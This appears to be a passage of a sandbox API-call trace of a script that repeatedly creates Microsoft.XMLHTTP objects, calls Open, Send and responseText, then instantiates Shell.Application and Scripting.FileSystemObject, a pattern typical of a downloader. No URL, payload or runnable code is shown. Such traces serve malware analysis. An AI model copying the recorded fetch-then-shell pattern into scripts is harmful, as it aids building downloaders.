	[0460.526] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0460.526] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0460.526] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0460.526] SysStringLen (param_1=0x0) returned 0x0
	[0460.526] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0460.526] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0460.526] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0460.526] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0460.527] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7348) returned 0x0
	[0460.527] ??2@YAPEAX_K@Z () returned 0x62f330
	[0460.527] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7348, pUnkSite=0x62f330) 
	[0460.527] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0460.527] XMLHTTPRequest:IUnknown:Release (This=0x49c7348) returned 0x0
	[0460.527] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0460.527] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0460.527] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0460.527] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0460.527] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0460.527] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0460.527] SysStringLen (param_1=0x0) returned 0x0
	[0460.527] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0460.527] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0460.527] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0460.527] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0460.527] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0460.528] ??2@YAPEAX_K@Z () returned 0x62f310
	[0460.528] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0460.528] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0460.528] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0460.528] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0460.528] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0460.528] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0460.528] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0460.528] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0460.528] longjmp () 
	[0460.528] longjmp () 
	[0460.528] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0460.528] SysStringLen (param_1=0x0) returned 0x0
	[0460.528] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0460.528] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0460.528] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0460.529] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0460.529] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7348) returned 0x0
	[0460.529] ??2@YAPEAX_K@Z () returned 0x62f330
	[0460.529] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7348, pUnkSite=0x62f330) 
	[0460.529] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0460.529] XMLHTTPRequest:IUnknown:Release (This=0x49c7348) returned 0x0
	[0460.529] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0460.529] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0460.529] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0460.529] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0460.529] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0460.529] longjmp () 
	[0460.529] longjmp () 
	[0460.530] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0460.530] SysStringLen (param_1=0x0) returned 0x0
	[0460.530] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0460.530] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0460.530] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0460.530] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0460.530] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0460.530] ??2@YAPEAX_K@Z () returned 0x62f310
	[0460.530] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0460.530] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0460.530] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0460.530] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0460.530] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0460.530] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0460.530] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0460.530] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0460.531] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0460.531] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0460.531] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0461.452] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0461.452] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0461.452] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0461.453] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0461.453] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0461.453] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0461.453] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0461.453] SysStringLen (param_1=0x0) returned 0x0
	[0461.453] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0461.453] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0461.453] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0461.453] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0461.453] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0461.453] ??2@YAPEAX_K@Z () returned 0x62f350
	[0461.454] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0461.454] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0461.454] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0461.454] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0461.454] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0461.454] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0461.454] SysStringLen (param_1=0x0) returned 0x0
	[0461.454] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0461.457] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0461.457] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0461.457] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0461.457] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0461.457] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0461.457] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0462.415] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
